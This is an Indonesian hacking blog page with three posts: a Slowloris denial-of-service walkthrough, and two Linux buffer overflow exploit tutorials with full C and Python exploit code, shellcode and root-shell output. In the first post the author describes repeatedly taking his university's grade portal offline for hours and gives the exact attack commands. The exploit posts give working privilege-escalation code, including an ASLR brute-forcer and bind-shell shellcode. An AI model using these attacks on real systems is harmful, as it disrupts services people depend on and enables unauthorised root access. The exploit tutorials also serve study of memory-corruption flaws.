./dev/sda /tmp/backtrack, Ppentest

DDos attack lagiii

Nah sekarang kita coba gunakan LBD dan Slowloris…
pertama saya sarankan jangan terlalu sering main beginian kasian karena merugikan..kemarin² saya kesal dengan kampus saya karena sudah ipk jelek pemberitahuan remedialpun ga jelas , di undur lah, nilai belum fix lah, udah tau saya mahasiswa goblok d bikin susah lagi..mana bayar 26rb/mata kuliah 😥 …jadi curhat wkwkwk…

oke, pertama gunakan lbd.sh untuk cek load balancing pada web caranya :

– Buka terminal ( ctrl + t )
– ketik cd Desktop ( tempat menyimpan kedua tools/file tadi )
– jalankan lbd.sh dengan perintah ./lbd.sh
– jika permision denied ketik dulu chmod 755 lbd.sh lalu coba lagi ketik ./lbd.sh
– jika berhasil langsung ketik ./lbd.sh example.com bisa juga dengan menggunakan ip web tsb caranya ping dulu
( ping http://www.example.com ) nanti ada ip yg muncul…
– tunggu hingga selesai dan lihat apakah menggunakan load balancing atau tidak jika tidak output akhir yg saya dapatkan seperti ini :

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

203.130.232.49 does NOT use Load-balancing.

berarti kita lanjutkan ke slowloris…. 🙂

– ketik pada terminal cd Desktop ( jika sudah langsung saja )
– ./slowloris.pl -dns [target] -port 80 -timeout 500 -num 500 -tcpto 5 -httpready
*selama melakukan dos terminal jangan d close
– tapi jika ingin lebih mantap silahkan pahami kutipan yang saya dapat dari http://forum.indonesianbacktrack.or.id/

keterangan :

* -dns : the target ( dapat berupa IP atau domain )

* -port : port yg di gunakan oleh webserver ( 80 )

* -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi dengan flag -test

* -num : jumlah soket yang digunakan untuk mendapatkan koneksi.Biasanya server apache akan membutuhkan nilai antara 400-600 atau tergantung pada konfigurasi

* -tcpto : TCP Timeout.

* -httpready: HTTPReady di gunakan apache untuk buffer connections. attacker dapat melewati perlindungan ini dengan mengirimkan permintaan POST bukan GET atau HEAD.

untuk mengetahui limit timeoout gunakan perintah
./slowloris.pl -dns [ip/webdomain target] -port 80 -test
tunggu sampai mememukan limit timeoutnya

saya mencoba dengan timeout 500 dan num 700, berhasil web tidak bisa d buka , tapi tidak lama kemudian bisa lagi 😦
dan sayapun memutuskan untuk iseng, timeout saya kasih 500 dan num 5000 wkwk hasilnya memuaskan,,
beberapa jam web tidak bisa d buka, (dengan catatan jika web sudah terbuka lagi saya ulangi lagi slowlorisnya)..otomatis yang mau login melihat nilai harus tertunda…itu hanya sebagai pengalaman saja 🙂
mungkin di postingan berikutnya saya akan share videonya karena mungkin kata2 saya ada yg tidak di mengerti atau berbelit2 mohon

Standard
./dev/sda /tmp/backtrack, Ppentest, Win Security

[Indonesian] Linux Buffer Overflow Tutorial III – “exploitsdb” Papers

									Linux Buffer Overflow Tutorial
									Edisi : Ketiga

Penulis : gunslinger_ <yudha.gunslinger@gmail.com>
Web	: http://gunslingerc0de.wordpress.com
Tanggal : Sat Jul 24 20:01:54 WIT 2010

Konten :
	0x01. Pendahuluan
	0x02. Skenario
	0x03. Kesimpulan
	0x04. Special thanks
	0x05. Stuff

					0x01. Pendahuluan
					~~~~~~~~~~~~~~~~~

Sebelumnya saya telah menulis artikel buffer overflow dengan 2 tehnik berbeda .
namun, dalam artikel tersebut kita tidak memakai randomisasi stack (ASLR) dan kita bisa mengalokasikan memory dengan mudah .
pada artikel kali ini saya akan menjelaskan tehnik buffer overflow dengan memakai randomisasi stack (ASLR).
ASLR adalah singkatan dari Address Space Layout randomization .
dengan kata lain, kita akan mengeksploitasi aplikasi buffer overflow dengan return address yang dinamis . 
maka mengeksploitasi dengan mengalokasikan return adress memory pada satu waktu hanya percuma saja 
karena pada waktu berbeda kita akan mendapatkan address yang berbeda (dinamis).
akan tetapi, ASLR tidak begitu kuat dalam mesin 32 bit .
faktanya, beberapa Linux kernel dikompilisasi dalam 23 bits dengan tujuan untuk mengidentifikasi relatif address 
di dalam stack dimana ruang address dapat teralokasi .

				" 2 ^ 23 == 8388608 atau 8 MB "

Hal tersebut berarti base stack address menggunakan address yang jatuh pada letak yang tidak dipastikan (random)
tetapi dalam hal random tersebut, hanya berada dalam jangkauan 8388608 byte atau 8 MB pada memori .
jika kita memanggil program yang rentan terhadap serangan melalui variabel environment yang sangat panjang
sebut saja 128 KB, dimana kebanyakan dari variabel environment tersebut adalah diisi dengan NOP ~ No OPeration (0x90) atau junk "A" (0x41) .
dan pada akhir variable environment tersebut kita tempatkan shellcode kita .
dan apa yang akan terjadi ? cepat atau lambat setelah melewati beberapa kali proses 
pengeksekusian tersebut akan menempatkan kita pada address yang kita inginkan .
No OPeration (NOP) atau junk "A" akan naik 1 demi 1 sampai pengeksekusian shellcode berhasil .
tehnik ini hampir sama dengan tehnik pada artikel buffer overflow kedua yang saya buat .
anda bisa lihat di http://www.exploit-db.com/papers/14108/ .

Dan jika kita mengeksekusikannya lewat exec*e (execve atau execle) melewati proses aplikasi yang rentan tersebut 
Contoh : variable environment kita berisi NOP atau junk + shellcode dengan panjang 128 KB .
coba kita hitung berapa persen payload kita dalam ruang address .

				" 128000 / 8000000 x 100% =  1.525878906% atau 1.6%"

Dalam perhitungan berikut membuktikan bahwa payload kita yang berukuran 128 KB .
mempunyai 1.525878906% (persen) atau 1.6% dari seluruh ruang address 100% ~ 8388608 bytes atau 8 MB .
jadi kita mempunyai kesempatan 1.6% dan akan semakin dekat dengan buffer yang rentan tersebut .
tentu saja kita akan membuat program yang akan mengexploitasi secara automatis 
karena kita akan mau tes 1 per 1 secara manual ~ That's was a very bad jokes isn't it ? ;)

					0x02. Skenario
					~~~~~~~~~~~~~~

Pada skenario dalam tutorial ini, kita mendapatkan kasus ada aplikasi yang rentan terhadap buffer overflow .
namun karena kita hanya user biasa (non-root) tentu kita tidak dapat mematikan ASLR untuk mengekploitasi aplikasi tersebut .
mari kita buat saja skenario tersebut .

gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ vim bof.c
gunslinger@c0debreaker:~/bof$ cat bof.c
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
	char buffer[400];
	strcpy(buffer, argv[1]);

	return 0;
}

gunslinger@c0debreaker:~/bof$ gcc -o bof -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
gunslinger@c0debreaker:~/bof$ sudo chown root:root bof
[sudo] password for gunslinger: 
gunslinger@c0debreaker:~/bof$ sudo chmod 4755 bof
gunslinger@c0debreaker:~/bof$ 

Skenario berhasil di buat .
Sekarang kita harus mencari berapa bytes yang di perlukan untuk mengoverwrite eip .
kita tidak perlu mencari secara manual berapa bytes yang kita butuhkan 
untuk mencari beberapa bytes yang di berikan agar si vilnerable program mengalami crash seperti artikel sebelumnya .
karena kita bisa pakai aplikasi yang saya buat .

gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

Usage: ./bufferbruteforce.py [options]
Options: -a, --application    	<path-to-application>   |   Target application for bruteforcing buffer 
         -s, --start      	<int>	          	|   start byte for bruteforcing buffer
         -e, --end  		<int>     	 	|   end byte for bruteforcing buffer
         -h, --help      	<help>          	|   print this help

Example: ./bufferbruteforce.py -a /home/gunslinger/bufferoverflow/bof -s 1 -e 500

gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/bof -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 404 byte(s)
[!] Application got segmentation fault by giving 404 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$

Ok sudah di temukan 404 bytes yang di perlukan untuk membuat vulnerable program tersebut mengalami crash .
sekarang kita cari berapa bytes yang di perlukan untuk membuat register eip tersebut teroverwrite .

gunslinger@c0debreaker:~/bof$ gdb bof
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) r `perl -e 'print "A" x 406'`
Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 406'`

Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) r `perl -e 'print "A" x 407'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 407'`

Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) r `perl -e 'print "A" x 408'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 408'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141	0x41414141
(gdb)

Eip teroverwrite total dengan huruf "A" tersebut .
Dan payload kita akan berukuran 408 bytes juga .
Sekarang kita lakukan debugging untuk menentukan perkiraan register esp (stack pointer) dan kita ambil salah satunya .
karena register tersebut tidak akan jatuh pada alamat yang statis .
pertama kita disassemble dulu dimana fungsi strcpy tersebut .

(gdb) disas main
Dump of assembler code for function main:
0x080483c4 <main+0>:	push   %ebp
0x080483c5 <main+1>:	mov    %esp,%ebp
0x080483c7 <main+3>:	sub    $0x198,%esp
0x080483cd <main+9>:	mov    0xc(%ebp),%eax
0x080483d0 <main+12>:	add    $0x4,%eax
0x080483d3 <main+15>:	mov    (%eax),%eax
0x080483d5 <main+17>:	mov    %eax,0x4(%esp)
0x080483d9 <main+21>:	lea    -0x190(%ebp),%eax
0x080483df <main+27>:	mov    %eax,(%esp)
0x080483e2 <main+30>:	call   0x80482f8 <strcpy@plt>
0x080483e7 <main+35>:	mov    $0x0,%eax
0x080483ec <main+40>:	leave  
0x080483ed <main+41>:	ret    
End of assembler dump.
(gdb) b *main+30
Breakpoint 1 at 0x80483e2
(gdb)

yah , terlihat bahwa fungsi strcpy terletak di 0x80483e2
0x080483e2 <main+30>:	call   0x80482f8 <strcpy@plt>

sekarang kita akan mencari dimana perkiraan register esp akan jatuh aplikasi tersebut .

(gdb) r hey where is esp ?
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof hey where is esp ?

Breakpoint 1, 0x080483e2 in main ()
(gdb) i r esp
esp            0xbfeba1f0	0xbfeba1f0
(gdb) r hey where is esp ?
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof hey where is esp ?

Breakpoint 1, 0x080483e2 in main ()
(gdb) i r esp
esp            0xbf98dcc0	0xbf98dcc0
(gdb) r hey where is esp ?
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof hey where is esp ?

Breakpoint 1, 0x080483e2 in main ()
(gdb) i r esp
esp            0xbfcc8800	0xbfcc8800
(gdb)

Terlihat bukan ? register esp jatuh pada address yang tidak tetap statis .
pertama kita dapatkan register esp terletak pada address -> 0xbfeba1f0
esp            0xbfeba1f0	0xbfeba1f0
kedua kita dapatkan register esp terletak pada address -> 0xbf98dcc0
esp            0xbf98dcc0	0xbf98dcc0
ketiga kita dapatkan register esp terletak pada address -> 0xbfcc8800
esp            0xbfcc8800	0xbfcc8800

hal itu dikarenakan ASLR yang membuat address tersebut jatuh pada address yang dinamis .
ok, sekarang tinggal kita pilih dari address ketiga tersebut, pada skenario tutorial ini
kita ambil register esp yang pertama kali yaitu : 0xbfeba1f0

dan kita jalankan program pengeksploitasi dengan RET (return address) 0xbfeba1f0 .

gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ vim stackbf.c
gunslinger@c0debreaker:~/bof$ gcc -o stackbf stackbf.c
gunslinger@c0debreaker:~/bof$ ./stackbf

Stack Brute Force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
Usage: ./stackbf <application> <payload_size>

gunslinger@c0debreaker:~/bof$ ./stackbf bof 408
[*] Using return address 0xbfeba1f0 
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
# id    
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAME OVER
GAME OVER
# exit
gunslinger@c0debreaker:~/bof$

Attack vector berhasil dilancarkan dengan mulus .
namun dapatkah jika return address tersebut di ganti ke address yang lebih rendah ?
coba kita gunakan RET (return address) 0xbffffff4

gunslinger@c0debreaker:~/bof$ vim stackbf.c
gunslinger@c0debreaker:~/bof$ gcc -o stackbf stackbf.c
gunslinger@c0debreaker:~/bof$ ./stackbf bof 408
[*] Using return address 0xbffffff4
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
(...after some second...)
# id    
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAME OVER
GAME OVER
# exit
gunslinger@c0debreaker:~/bof$

Berhasil, hanya saja memerlukan waktu beberapa detik untuk spawn shell .

					0x03. Kesimpulan
					~~~~~~~~~~~~~~~~

Dengan experimen berikut, kita menyimpulkan bahwa ASLR tidak begitu kuat dalam mesin 32 bit.

					0x04. Special thanks
					~~~~~~~~~~~~~~~~~~~~

Thanks to : devilzc0de crew and jasakom crew
	  : www.devilzc0de.org / www.devilzc0de.com - www.jasakom.com , indonesianhacker.org, yogyacarderlink.web.id
	  : serverisdown.org, xc0de.or.id, echo.or.id, hacker-newbie.org, tecon-crew.org
	  : Scut, jonathan salwan, mywisdom, r0073r, d3hydr8 (we miss you bro), ty myler
	  : And all exploit database...

					0x05. Stuff
					~~~~~~~~~~~

------------------------------------------stackbf.c------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
	You can use debugger to get esp address, that can make program will be defeated more faster !
	RET is return address we use to overwrite EIP . we can use 0xbffffff4 for default, but may take sometime...
*/
#define RET 0xbffffff4  // you may change this
#define NOP 0x90	

// Length of environment variable ~ 128 Kb
#define ENV_LEN 128000

char shellcode[] =
	/* 
	; standard /bin//sh
	global _start

	_start:

	xor	eax,eax
	push	byte	11
	pop	eax
	push	ebx
	push	0x68732f2f
	push	0x6e69622f
	mov	ebx,esp
	xor	ecx,ecx
	xor	edx,edx
	push	ebx
	int	0x80

	*/
	"\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73"
	"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";

int main(int argc, char **argv)
{
	char *application = NULL;
	char *buffer = NULL;
	char env_var[ENV_LEN];
	char *env[2] = { env_var, NULL};
	int *p, num, ret, pid, payload_size;

	if (argc < 3)
	{
		printf("\nStack Brute Force");
		printf("\nProgrammer : Gunslinger_");
		printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
		exit(1);
	}

	printf("[*] Using return address 0x%x \n", RET);
	printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
	printf("[*] Shellcode size %d bytes\n", strlen(shellcode));

	application = strdup(argv[1]);
	payload_size = atoi(argv[2]);
	buffer = (char*) malloc(payload_size);

	memset (env_var, NOP, ENV_LEN);

	memcpy (env_var+ENV_LEN-strlen(shellcode)-1, shellcode, strlen(shellcode));
	env_var[ENV_LEN-1]=0;

	p = (int*) buffer;

	for (num = 0; num < payload_size; num += sizeof(int), p++)
		*p = RET;
	*p=0;
	do {
		switch(pid=fork())
		{
		case 0:
			execle (application, application, buffer, NULL, env);
			exit(0);
			break;
		default:
			waitpid (pid, &ret, 0);
			break;
		}
	}
while (ret);
}
-------------------------------------------------EOF---------------------------------------------------

------------------------------------------bufferbruteforce.py------------------------------------------
#!/usr/bin/python
import sys, time, StringIO, commands, re, os, os.path

'''
	This is buffer brute forcer program, allow you to brute forcing buffer and know how bytes to make got Segmentation fault .
	Written for educational purpose and pentest only. Use it at your own risk .
	Toolname : bufferbruteforce.py
	Author	 : gunslinger_ <yudha.gunslinger@gmail.com>
	date	 : Sun Jul  4 00:58:54 WIT 2010
	You can use this simple bof.c for testing .
	-----------------bof.c-----------------
	#include <stdio.h>
	#include <string.h>

	int main(int argc, char** argv)
	{
		char buffer[400];
		strcpy(buffer, argv[1]);

		return 0;
	}
	------------------EOF------------------
	Example usage :
	root@c0debreaker:/home/gunslinger/bof# cat bof.c
	#include <stdio.h>
	#include <string.h>

	int main(int argc, char** argv)
	{
		char buffer[400];
		strcpy(buffer, argv[1]);

		return 0;
	}
	root@c0debreaker:/home/gunslinger/bof# echo 0 > /proc/sys/kernel/randomize_va_space
	root@c0debreaker:/home/gunslinger/bof# gcc -o bof -g -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
	root@c0debreaker:/home/gunslinger/bof# exit
	gunslinger@c0debreaker:~/bof$ ./bbf.py -a /home/gunslinger/bof/bof -s 1 -e 500

	Buffer brute force
	Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

	[*] Checking Existing application 					[Ok]
	[*] Checking '/proc/sys/kernel/randomize_va_space' 			[Ok]
	[*] Checking perl 							[Ok]
	[*] Preparing for bruteforcing buffer 					[Ok]
	[*] buffering on 404 byte(s)
	[!] Application got segmentation fault by giving 404 byte(s) into buffer !!

	gunslinger@c0debreaker:~/bof$
'''

'''define color'''
green 	= '33[38m'
red 	= '33[31m'
reset 	= '33[0;0m'

name	= sys.argv[0]
fail 	= "[Failure]"
ok 	= "[Ok]"

face	= '''
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>'''

option = '''
Usage: %s [options]
Options: -a, --application    	<path-to-application>   |   Target application for bruteforcing buffer 
         -s, --start      	<int>	          	|   start byte for bruteforcing buffer
         -e, --end  		<int>     	 	|   end byte for bruteforcing buffer
         -h, --help      	<help>          	|   print this help

Example: %s -a /home/gunslinger/bufferoverflow/bof -s 1 -e 500
''' % (name,name)

def myface() :
	print face

def helpMe() :
	myface()
	print option
	sys.exit(1)

for arg in sys.argv:
	if arg.lower() == '-a' or arg.lower() == '--application':
            app = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-s' or arg.lower() == '--start':
            counter = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-e' or arg.lower() == '--end':
            end = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-h' or arg.lower() == '--help':
        	helpMe()
	elif len(sys.argv) <= 1:
		helpMe()

def checkingexistingfile():
	if os.path.exists(app):
		exfile = green+ok
	else:
		exfile = red+fail
	print "\n[*] Checking Existing application \t\t\t\t\t%s%s" % (exfile, reset)
	if exfile == red+fail:
		print "[*] Please checking your application target path"
		exit()

def checkperl():
	perl = "perl -e \'print \"A\" x 1\'"
	result = StringIO.StringIO(commands.getstatusoutput(perl)[1]).read()
	A = re.findall("A", result)
	if A:
		print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (green, ok, reset)
	else:
		print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (red, fail, reset)	
		print "[*] Are perl installed on your system ?"
		exit()

def bruteforcebuff():
	global counter
	print "[*] Preparing for bruteforcing buffer \t\t\t\t\t%s%s%s" % (green, ok, reset)
	while counter <= end :
		try:
			sys.stdout.write("\r[*] buffering on %s%d%s byte(s)" % (red,int(counter),reset))
			sys.stdout.flush()
			args = app+' '+'`perl -e \'print "A" x '+repr(counter)+'\'`'
			SIGSEGV = StringIO.StringIO(commands.getstatusoutput(args)[0]).read()
			segmentation_fault = re.findall("35584", SIGSEGV)
			if segmentation_fault:
				print "\n[!] Application got segmentation fault by giving %s%d%s byte(s) into buffer !!\n" % (red, int(counter), reset)
				break
			counter = int(counter) + 1
		except KeyboardInterrupt:
			print "\n[-] Exiting %s" % (name)
			sys.exit(1)

def main():
	myface()
	checkingexistingfile()
	checkperl()
	bruteforcebuff()

if __name__ == '__main__':
	main()
--------------------------------------------------------------EOF--------------------------------------------------------
Standard
Ppentest, Win Security

[Indonesian] Linux Buffer Overflow Tutorial II – “exploitsdb” Papers

							Linux Buffer Overflow Tutorial
							Edisi : Kedua

Penulis : gunslinger_ <yudha.gunslinger@gmail.com>
Tanggal : Mon Jun 28 21:38:14 WIT 2010

Konten  :
1. Pendahuluan
2. Skenario
3. Fungsi getenv()
4. Exploitasi
5. Kesimpulan
6. Special thanks

-- Pendahuluan
Pada tutorial edisi pertama saya menjelaskan tutorial buffer overflow berbuffer 400 byte.
anda bisa melihat tutorial sebelumnya disini -> http://www.exploit-db.com/papers/14069/
sekarang saya akan menjelaskan "bagaimana cara jika buffer lebih kecil dari ukuran payload kita terutama shellcode ?"
dan saya akan menjelaskan strateginya pada tutorial ini.

-- Skenario
kita bisa lihat source aplikasi sebelumnya mirip pada source aplikasi tutorial ini. 
hanya saja yang membedakan buffernya. kali ini aplikasi berbuffer 10 bytes.

sebelum melanjutkan experimen pada skenario tutorial ini, jangan lupa matikan randomisasi stack terlebih dahulu.

root@bt:~# cat /proc/sys/kernel/randomize_va_space
2
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space
0
root@bt:~#

---------------------bof2.c--------------------------
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
        char buffer[10];
        strcpy(buffer, argv[1]);

        return 0;
}
---------------------EOF-----------------------------

save dengan nama bof2.c ,compile program tersebut . 
perhatian : pada saat mengompile tambahkan opsi -fno-stack-protector dan -mpreferred-stack-boundary=2.

root@bt:~# gcc -g -o bof2 -fno-stack-protector -mpreferred-stack-boundary=2 bof2.c

jadi, bagaimana cara pengexploitasiannya jika buffer sekecil itu ?
kita bisa gunakan "ENVIRONMENT VARIABLE" untuk menyimpan nopsled dan shellcode .
lalu kita ulangi address NOP sampai mengoverwrite register EIP.

langkah pertama, kita perlu menaruh shellcode ke bentuk binary.
saya akan gunakan shellcode binding port 13123 pada tutorial ini, 
dan anda bisa melihat shellcode tersebut di sini : http://inj3ct0r.com/exploits/12608

root@bt:~/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5" > shellcode3.bin
root@bt:~/bof# cat shellcode3.bin
ë^1ɱelÿ5éuöëèêÿÿÿfõff67¾3øå¾ûð7hx¾E¾3øå¾è9å¾3øå¾øfþåtµvåtµvåtµdd¨d£¾?¾å@µroot@bt:~/bof#

selanjutnya, kita buat "ENVIRONMENT VARIABLE" berisi : 200 bytes NOPSLED + SHELLCODE

root@bt:~/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@bt:~/bof# echo $PAYLOAD
ë^1ɱelÿ5éuöëèêÿÿÿfõff67¾3øå¾ûð7hx¾E¾3øå¾è9å¾3øå¾øfþåtµvåtµvåtµdd¨d£¾?¾å@µ
root@bt:~/bof#

ok, kita baru saja selesai menaruh PAYLOAD kita di "ENVIRONMENT VARIABLE".

-- Fungsi getenv()
sekarang kita gunakan getenv() pada bahasa c. 
fungsi getenv() adalah untuk mendapatkan return address variable environment (get environment variable).
jadi kita menggunakan fungsi tersebut untuk mendapatkan return address PAYLOAD kita sebelumnya pada "ENVIRONMENT VARIABLE".
dan source aplikasinya seperti berikut .

---------------------getenv.c--------------------------
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char** argv)
{
        printf("%s terletak pada address %p\n", argv[1], getenv(argv[1]));
        return (0);
}
---------------------EOF-----------------------------

yah sangat simple bukan?, namun sangat berguna.

lalu compile program tersebut
root@bt:~/bof# gcc -o getenv getenv.c
root@bt:~/bof# 

sekarang, kita bisa liat dimana alamat PAYLOAD kita berada.

root@bt:~/bof# ./getenv PAYLOAD
PAYLOAD terletak pada address 0xbffffe1e
root@bt:~/bof#

sudah jelas... kita mengetahui PAYLOAD terletak pada address 0xbffffe1e dengan mudah .
kemudian kita tambahkan, sebut saja 100 bytes karena kita harus menemukan alamat yang terletak dengan alamat pertengahan NOPSLED berada.

root@bt:~/bof# printf "%x\n" $((0xbffffe1e + 100))
bffffe82
root@bt:~/bof#

sudah kita dapatkan 0xbffffe1e + 100 = bffffe82 , lalu kita rubah ke bentuk little endian.
-> 82feffbf
lalu kita ubah ke bentuk shellcode
-> \x82\xfe\xff\xbf

-- Eksploitasi
sekarang saatnya kita run PAYLOAD kita pada aplikasi yang vulnerable buffer overflow tersebut .

root@bt:~/bof# ./bof2 $(perl -e 'print "\x82\xfe\xff\xbf" x 10')
Segmentation fault
root@bt:~/bof#

kita mendapatkan segmentation fault karena kita tidak menggunakan sederetan perulangan address. 
lalu bagaimana ? kita bisa gunakan NOP untuk mendorong (push) address dengan cara menaikan byte per byte.

root@bt:~/bof# ./bof2 $(perl -e 'print "\x90" . "\x82\xfe\xff\xbf" x 10')
Segmentation fault
root@bt:~/bof#

masih mendapatkan segmentation fault, coba kita naikan 1 byte demi byte lagi pada address NOP...

root@bt:~/bof# ./bof2 $(perl -e 'print "\x90" x 2 . "\x82\xfe\xff\xbf" x 10')

OoOoOpsss, program bof tidak exit ? apa yang terjadi ? apa shellcode kita tereksekusi dengan baik ?
sebelumnya kita menggunakan shellcode bindport pada port 13123 , 
coba kita buka tab konsole baru dan sambungkan dengan netcat . 

root@bt:~# nc localhost 13123
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
hostname
bt
echo YUMMY!
YUMMY!

kita sudah berhasil lagi dalam mengexploitasi buffer overflow .

-- Kesimpulan
kesimpulannya, bahwa seberapa kecil buffer pada aplikasi tetap memungkinkan terjadinya buffer overflow . 
untuk mencegah terjadinya buffer overflow adalah dengan cara membatasi seberapa bytes input data yang dimasukan oleh user . 

-- Special thanks : devilzc0de crew and jasakom crew
		  : www.devilzc0de.org / www.devilzc0de.com - www.jasakom.com , indonesianhacker.org, yogyacarderlink.web.id
		  : serverisdown.org, xc0de.or.id, echo.or.id, hacker-newbie.org, tecon-crew.org
		  : And all exploit database...
Standard